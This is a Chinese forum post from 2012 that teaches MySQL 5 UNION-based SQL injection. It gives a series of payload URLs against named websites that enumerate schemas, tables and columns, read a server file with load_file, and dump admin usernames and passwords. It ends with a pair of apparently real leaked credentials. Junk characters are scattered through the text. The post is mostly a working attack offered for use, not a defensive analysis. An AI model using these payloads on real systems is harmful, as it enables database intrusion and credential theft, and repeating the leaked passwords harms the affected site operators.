此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似2 @" o0 m& c% ~1 F* t: J; @6 g
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人& k5 ]" D. s9 c( G8 \
' B' G8 }/ t7 Q- R/ X3 d5 |6 t
3 L$ c" r4 l3 [5 V0 u x4 A优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
/ g1 b* z8 Y% Z6 F2 [( u
" D* o* z/ p- a n缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
4 ` H# e1 z, Q& j
# Z# Q) [, Y0 f5 i. T2 E' j下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
; |; ]) a; b- { `! [$ S; J2 |在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
. i+ r; n9 x0 N# J2 B/ I- Z
5 M; K+ S+ v/ B+ d" i0 lhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
0 l+ ]- x6 B( `+ X ~) {% \; X, m) x3 @9 n! Z* c5 }1 [
读出所有库:
! d) ^2 B3 h4 ^" p6 `1 r' S1 f2 t- d ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
5 d0 j: V, G& \7 w6 V% S. _( h3 X2 N7 V" O- [: |+ U
& Y ]3 {/ H" _# ^/ A% P
6 Y, U- b& G) f读出所有表:, T' S4 ~3 n5 l+ {
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()2 \/ Y" j3 ]8 V$ b$ w, p
" ` ?$ \$ I0 P% b& w
读出所有表字段: _+ T$ w) d" ^3 b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
2 u5 P: u) w& C*/ (97,100,109,105,110)为admin的ascii码 依次类推
$ y. T- W/ j" V0 e) x" A/ H& L, |9 O4 M# i
读出所有表字段里的内容:
, C& r5 s5 q7 }/ ^ |0 G' C/ `/ @2 |http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
" _* H% j- n* H: S2 ?4 Z/ r
: T9 p, m3 M5 d: a6 X
, q: q, F+ O3 D% z. ]' w
# J* n9 i2 F" }& r+ l. C/ U: w9 w' `4 y
. p( T% |% p6 T8 s7 B* [0 V; P/ ]- F" @9 C9 U
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23( b9 N8 f: x# y& s' U( m
" A8 X- C- j& }) A! i: P- F, B
; `' m' E. H, Z4 y1 thttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
$ p; c9 U0 C X8 k/ x. `
$ ^( F+ Y1 B; ]6 ~/ ~http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23. X) `7 {) U, N! q$ h
! y' L# Q( x, h+ I4 m; k
9 |- A) p, _' `- s- p' @
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23% Y9 L+ M( T( H7 D( i
( L, H, p6 r2 R/ h, c, D( p$ l' ]4 G! S5 a; m
webmaster:dzb521123,simlab:simadmin20043233
8 ?6 [. L9 l1 \" q9 c1 T |
发表于 2012-9-13 16:37:34
收藏
支持
反对